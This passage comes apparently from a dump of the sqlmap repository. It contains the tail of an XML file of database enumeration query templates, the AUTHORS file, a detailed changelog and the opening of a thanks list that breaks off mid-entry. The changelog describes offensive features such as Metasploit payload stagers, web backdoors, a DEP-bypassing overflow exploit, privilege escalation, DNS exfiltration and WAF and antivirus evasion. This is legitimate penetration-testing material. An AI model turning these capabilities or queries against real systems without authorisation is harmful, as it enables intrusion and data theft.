INFORMATION_SCHEMA.SCHEMATA\"/>\n            <blind query=\"SELECT DISTINCT TOP (%d,1) schema_name FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY 1\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES\" condition=\"table_schema\"/>\n            <blind query=\"SELECT TOP (%d,1) table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' ORDER BY 1\" count=\"SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n            <blind query=\"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" query2=\"SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'\" count=\"SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n            <blind query=\"SELECT TOP (%d,1) %s FROM %s.%s ORDER BY %s\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <users>\n            <inband query=\"SELECT u_name FROM SYS_USERS WHERE U_IS_ROLE=0 ORDER BY 1\"/>\n            <blind query=\"SELECT TOP (%d,1) u_name FROM SYS_USERS WHERE U_IS_ROLE=0 ORDER BY 1\" count=\"SELECT COUNT(DISTINCT(u_name)) FROM SYS_USERS\"/>\n        </users>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <search_db/>\n        <search_table/>\n        <search_column/>\n   </dbms>\n</root>\n"
  },
  {
    "path": "sqlmap/doc/AUTHORS",
    "content": "Bernardo Damele Assumpcao Guimaraes (@inquisb)\r\n<bernardo@sqlmap.org>\r\n\r\nMiroslav Stampar (@stamparm)\r\n<miroslav@sqlmap.org>\r\n\r\nYou can contact both developers by writing to dev@sqlmap.org\r\n"
  },
  {
    "path": "sqlmap/doc/CHANGELOG.md",
    "content": "# Version 1.6 (2022-01-03)\n\n* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)\n* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1)\n\n# Version 1.5 (2021-01-03)\n\n* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)\n* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)\n\n# Version 1.4 (2020-01-01)\n\n* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)\n* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1)\n\n# Version 1.3 (2019-01-05)\n\n* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)\n* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)\n\n# Version 1.2 (2018-01-08)\n\n* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)\n* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)\n\n# Version 1.1 (2017-04-07)\n\n* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)\n* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)\n\n# Version 1.0 (2016-02-27)\n\n* Implemented support for automatic decoding of page content through detected charset.\n* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).\n* Major improvements to program stabilization based on user reports.\n* Added new tampering scripts avoiding popular WAF/IPS mechanisms.\n* Fixed major bug with DNS leaking in Tor mode.\n* Added wordlist compilation made of the most popular cracking dictionaries.\n* Implemented multi-processor hash cracking routine(s).\n* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.\n* Old resume files are now deprecated and replaced by faster SQLite based session mechanism.\n* Substantial code optimization and smaller memory footprint.\n* Added option `-m` for scanning multiple targets enlisted in a given textual file.\n* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.\n* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.\n* Added option `--host` for manually setting HTTP Host header value.\n* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.\n* Added option `--skip` for skipping tests for given parameter(s).\n* Added switch `--titles` for comparing pages based only on their titles.\n* Added option `--charset` for forcing character encoding used for data retrieval.\n* Added switch `--check-tor` for checking if Tor is used properly.\n* Added option `--crawl` for multithreaded crawling of a given website starting from the target url.\n* Added option `--csv-del` for manually setting delimiting character used in CSV output.\n* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.\n* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).\n* Added switch `--check-waf` for checking of existence of WAF/IPS protection.\n* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.\n* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.\n* Major improvements to switches `--tables` and `--columns`.\n* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.\n* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.\n* Added switch `-a` to enumerate all DBMS data.\n* Added option `--alert` to run host OS command(s) when SQL injection is found.\n* Added option `--answers` to set user answers to asked questions during sqlmap run.\n* Added option `--auth-file` to set HTTP authentication PEM cert/private key file.\n* Added option `--charset` to force character encoding used during data retrieval.\n* Added switch `--check-tor` to force checking of proper usage of Tor.\n* Added option `--code` to set HTTP code to match when query is evaluated to True.\n* Added option `--cookie-del` to set character to be used while splitting cookie values.\n* Added option `--crawl` to set the crawling depth for the website starting from the target URL.\n* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `\"logout\"`).\n* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.\n* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.\n* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).\n* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).\n* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.\n* Added switch `--disable-coloring` to disable console output coloring.\n* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).\n* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).\n* Added option `--eval` for setting the Python code that will be evaluated before the request.\n* Added switch `--force-ssl` to force usage of SSL/HTTPS.\n* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.\n* Added option `-H` to set extra HTTP header (e.g. `\"X-Forwarded-For: 127.0.0.1\"`).\n* Added switch `-hh` for showing advanced help message.\n* Added option `--host` to set the HTTP Host header value.\n* Added switch `--hostname` to turn on retrieval of DBMS server hostname.\n* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.\n* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.\n* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).\n* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.\n* Added switch `--invalid-logical` for usage of logical operations while invalidating values.\n* Added switch `--invalid-string` for usage of random strings while invalidating values.\n* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.\n* Added option `-m` to set the textual file holding multiple targets for scanning purposes.\n* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).\n* Added switch `--no-cast` for turning off payload casting mechanism.\n* Added switch `--no-escape` for turning off string escaping mechanism.\n* Added option `--not-string` for setting string to be matched when query is evaluated to False.\n* Added switch `--offline` to force work in offline mode (i.e. only use session data).\n* Added option `--output-dir` to set custom output directory path.\n* Added option `--param-del` to set character used for splitting parameter values.\n* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).\n* Added option `--proxy-file` to set file holding proxy list.\n* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.\n* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.\n* Added option `--safe-post` to set POST data for sending to safe URL.\n* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.\n* Added option `--skip` to skip testing of given parameter(s).\n* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.\n* Added switch `--skip-urlencode` to skip URL encoding of payload data.\n* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.\n* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).\n* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).\n* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.\n* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).\n* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`).\n* Added switch `--titles` to turn on comparison of pages based only on their titles.\n* Added option `--tor-port` to explicitly set Tor proxy port.\n* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).\n* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.\n* Added option `--where` to set `WHERE` condition to be used during the table dumping.\n* Added option `-X` to exclude DBMS database table column(s) from enumeration.\n* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.\n* Added option `-z` for usage of short mnemonics (e.g. `\"flu,bat,ban,tec=EU\"`).\n\n# Version 0.9 (2011-04-10)\n\n* Rewritten SQL injection detection engine.\n* Support to directly connect to the database without passing via a SQL injection, option `-d`.\n* Added full support for both time-based blind SQL injection and error-based SQL injection techniques.\n* Implemented support for SQLite 2 and 3.\n* Implemented support for Firebird.\n* Implemented support for Microsoft Access, Sybase and SAP MaxDB.\n* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.\n* Added support to tamper injection data with option `--tamper`.\n* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.\n* Added support to enumerate roles on Oracle, `--roles` switch.\n* Added support for SOAP based web services requests.\n* Added support to fetch unicode data.\n* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.\n* Implemented several optimization switches to speed up the exploitation of SQL injections.\n* Support to test and inject against HTTP Referer header.\n* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.\n* Implemented feature to speedup the enumeration of table names.\n* Support for customizable HTTP(s) redirections.\n* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.\n* Support to parse and test forms on target url, switch `--forms`.\n* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.\n* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.\n* Added safe URL feature, `--safe-url` and `--safe-freq`.\n* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.\n* Implemented few other features and switches.\n* Over 100 bugs fixed.\n* Major code refactoring.\n* User's manual updated.\n\n# Version 0.8 (2010-03-14)\n\n* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.\n* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.\n* Support for takeover features on PostgreSQL 8.4.\n* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.\n* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.\n* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.\n* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.\n* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.\n* Updated active fingerprint for PostgreSQL 8.4.\n* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.\n* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.\n* Support for Certificate authentication, `--auth-cert` option added.\n* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.\n* Added option `-r` to load a single HTTP request from a text file.\n* Added switch `--ignore-proxy` to ignore the system default HTTP proxy.\n* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.\n* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.\n* Major bug fix and enhancements to the multi-threading (`--threads`) functionality.\n* Fixed URL encoding/decoding of GET/POST parameters and Cookie header.\n* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.\n* Major bugs fixed.\n* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.\n* Major code cleanup.\n* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.\n* Updated user's manual.\n* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html.\n\n# Version 0.8 release candidate (2009-09-21)\n\n* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.\n* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.\n* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.\n* Added options for MySQL and PostgreSQL to inject custom user-defined functions.\n* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.\n* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.\n* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.\n* Minor bugs fixed.\n* Major code refactoring.\n\n# Version 0.7 (2009-07-25)\n\n* Adapted Metasploit wrapping functions to work with latest 3.3 development version too.\n* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.\n* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.\n* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).\n* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.\n* Major bug fix to sql-query/sql-shell features.\n* Major bug fix in `--read-file` option.\n* Major silent bug fix to multi-threading functionality.\n* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.\n* Fixed MySQL 'comment injection' version fingerprint.\n* Fixed basic Microsoft SQL Server 2000 fingerprint.\n* Many minor bug fixes and code refactoring.\n\n# Version 0.7 release candidate (2009-04-22)\n\n* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;\n* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;\n* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;\n* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;\n* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;\n* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;\n* Speed up the inference algorithm by providing the minimum required charset for the query output;\n* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;\n* Many minor bug fixes, minor enhancements and layout adjustments.\n\n# Version 0.6.4 (2009-02-03)\n\n* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;\n* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;\n* Major speed increase in DBMS basic fingerprint;\n* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;\n* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;\n* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;\n* Minor layout adjustment to the `--update` output;\n* Increased default timeout to 30 seconds;\n* Major bug fix to correctly handle custom SQL \"limited\" queries on Microsoft SQL Server and Oracle;\n* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;\n* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;\n* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;\n* Updated documentation.\n\n# Version 0.6.3 (2008-12-18)\n\n* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l <filepath>;\n* Major enhancement to support Partial UNION query SQL injection technique too;\n* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;\n* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;\n* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;\n* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;\n* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;\n* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;\n* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;\n* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;\n* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;\n* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;\n* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;\n* Minor improvements to sqlmap Debian package files;\n* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;\n* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;\n* Major bug fix to correctly enumerate columns on Microsoft SQL Server;\n* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;\n* Minor bug fix to correctly dump table entries when the column is provided;\n* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;\n* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;\n* Increased default output level from 0 to 1;\n* Updated documentation.\n\n# Version 0.6.2 (2008-11-02)\n\n* Major bug fix to correctly dump tables entries when `--stop` is not specified;\n* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;\n* Major bug fix when the request is POST to also send the GET parameters if any have been provided;\n* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;\n* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;\n* Minor bug fix in MySQL comment injection fingerprint technique;\n* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;\n* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;\n* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;\n* More user-friendly warning messages.\n\n# Version 0.6.1 (2008-08-20)\n\n* Major bug fix to blind SQL injection bisection algorithm to handle an exception;\n* Added a Metasploit Framework 3 auxiliary module to run sqlmap;\n* Implemented possibility to test for and inject also on LIKE statements;\n* Implemented `--start` and `--stop` options to set the first and the last table entry to dump;\n* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;\n* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;\n* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;\n* Minor bug fix to correctly handle parameters' value with `%` character.\n\n# Version 0.6 (2008-09-01)\n\n* Complete code refactor and many bugs fixed;\n* Added multithreading support to set the maximum number of concurrent HTTP requests;\n* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;\n* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;\n* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;\n* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;\n* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;\n* Created sqlmap .exe (Windows) portable executable;\n* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;\n* Improved automatic check for parenthesis when testing and forging SQL query vector;\n* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;\n* Implemented support for HTTPS requests over HTTP(S) proxy;\n* Added a check to handle NULL or not available queries output;\n* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;\n* Improved XML files structure;\n* Implemented the possibility to change the HTTP Referer header;\n* Added support to resume from session file also when running with inband SQL injection attack;\n* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;\n* Added a check to assure that the provided string to match (`--string`) is within the page content;\n* Fixed various queries in XML file;\n* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;\n* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;\n* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;\n* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;\n* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;\n* Added support to inject also on Set-Cookie parameters;\n* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;\n* Renamed some command line options;\n* Added a conversion library;\n* Added code schema and reminders for future developments;\n* Added Copyright comment and $Id$;\n* Updated the command line layout and help messages;\n* Updated some docstrings;\n* Updated documentation files.\n\n# Version 0.5 (2007-11-04)\n\n* Added support for Oracle database management system\n* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;\n* Added support to extract database users password hash on Microsoft SQL Server;\n* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;\n* Added support for SQL injection on HTTP Cookie and User-Agent headers;\n* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();\n* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;\n* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;\n* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);\n* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;\n* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;\n* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;\n* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;\n* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);\n* Minor fix in lib/request.py to properly encode the url to request in case the \"fixed\" part of the url has blank spaces;\n* More minor layout enhancements in some libraries;\n* Renamed DMBS plugins;\n* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;\n* Updated all documentation files.\n\n# Version 0.4 (2007-06-15)\n\n* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;\n* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;\n* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);\n* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);\n* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <https://sqlmap.org/dev/>;\n* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;\n* Improved logging functionality: passed from banal 'print' to Python native logging library;\n* Added support for more than one parameter in `-p` command line option;\n* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);\n* Added the command line option `--remote-dbms` to manually specify the remote DBMS;\n* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;\n* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);\n* Added support to specify the database table column to enumerate (`-C COL`);\n* Added inband SQL injection (UNION query) support (`--union-use`);\n* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;\n* Reviewed the directory tree structure;\n* Split lib/common.py: inband injection functionalities now are moved to lib/union.py;\n* Updated documentation files.\n\n# Version 0.3 (2007-01-20)\n\n* Added module for MS SQL Server;\n* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;\n* Added PostgreSQL dbms active fingerprint;\n* Added support for string match (`--string`);\n* Added support for UNION check (`--union-check`);\n* Removed duplicated code, delegated most of features to the engine in common.py and option.py;\n* Added support for `--data` command line argument to pass the string for POST requests;\n* Added encodeParams() method to encode url parameters before making http request;\n* Many bug fixes;\n* Rewritten documentation files;\n* Complete code restyling.\n\n# Version 0.2 (2006-12-13)\n\n* complete refactor of entire program;\n* added TODO and THANKS files;\n* added some papers references in README file;\n* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;\n* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;\n* replaced old inference algorithm with a new bisection algorithm.\n* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;\n* improved Common class, adding support for http proxy and http post method in hash_page;\n* added OptionCheck class in option.py which performs all needed checks on command line parameters and values;\n* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;\n* improved output methods in dump.py;\n* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.\n"
  },
  {
    "path": "sqlmap/doc/THANKS.md",
    "content": "# Individuals\n\nAndres Tarasco Acuna, <atarasco(at)gmail.com>\n* for suggesting a feature\n\nSantiago Accurso, <saccurso(at)skygear.com.ar>\n* for reporting a bug\n\nSyed Afzal, <syed(at)syedafzal.in>\n* for contributing a WAF script varnish.py\n\nZaki Akhmad, <zakiakhmad(at)gmail.com>\n* for suggesting a couple of features\n\nOlu Akindeinde, <seyi.akin(at)gmail.com>\n* for reporting a couple of bugs\n\nDavid Alvarez, <david.alvarez.s(at)gmail.com>\n* for reporting a bug\n\nSergio Alves, <sergioalexandre.alves(at)gmail.com>\n* for reporting a bug\n\nThomas Anderson, <darkc0de(at)live.com.ph>\n* for reporting a bug\n\nChip Andrews, <chip(at)sqlsecurity.com>\n* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site\n\nSmith Andy, <teh.one(at)hotmail.com>\n* for suggesting a feature\n\nOtavio Augusto, <otavioarj(at)gmail.com>\n* for reporting a minor bug\n\nSimon Baker, <simonb(at)sec-1.com>\n* for reporting some bugs\n\nRyan Barnett, <RBarnett(at)trustwave.com>\n* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html\n\nEmiliano Bazaes, <emiliano(at)7espejos.com>\n* for reporting a minor bug\n\nDaniele Bellucci, <daniele.bellucci(at)gmail.com>\n* for starting sqlmap project and developing it between July and August 2006\n\nSebastian Bittig, <s.bittig(at)r-tec.net> and the rest of the team at r-tec IT Systeme GmbH\n* for contributing the DB2 support initial patch: fingerprint and enumeration\n\nAnthony Boynes, <aboynes(at)gmail.com>\n* for reporting several bugs\n\nMarcelo Toscani Brandao\n* for reporting a bug\n\nVelky Brat, <velkybrat(at)gmail.com>\n* for suggesting a minor enhancement to the bisection algorithm\n\nJames Briggs, <james.briggs(at)ngssecure.com>\n* for suggesting a minor enhancement\n\nGianluca Brindisi, <g(at)brindi.si>\n* for reporting a couple of bugs\n\nJack Butler, <fattredd(at)hotmail.com>\n* for contributing the sqlmap site favicon\n\nUlisses Castro, <uss.thebug(at)gmail.com>\n* for reporting a bug\n\nRoberto Castrogiovanni, <castrogiovanni.roberto(at)gmail.com>\n* for reporting a 